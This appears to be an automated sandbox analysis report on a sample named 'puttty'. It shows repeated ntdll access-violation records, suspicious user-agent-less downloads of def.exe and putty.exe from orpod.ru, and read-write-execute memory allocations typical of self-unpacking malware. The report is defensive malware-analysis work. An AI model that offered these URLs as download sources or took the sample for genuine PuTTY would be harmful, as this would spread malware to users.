__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://orpod.ru/def.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://orpod.ru/putty.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://www.google.com/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://www.bing.com/

Performs some HTTP requests (4 events)

request	GET http://orpod.ru/def.exe
request	GET http://orpod.ru/putty.exe
request	GET https://www.google.com/
request	GET https://www.bing.com/

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

orpod.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba1000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba2000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory March 28, 2021, 12:10 p.m.	process_identifier: 6240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
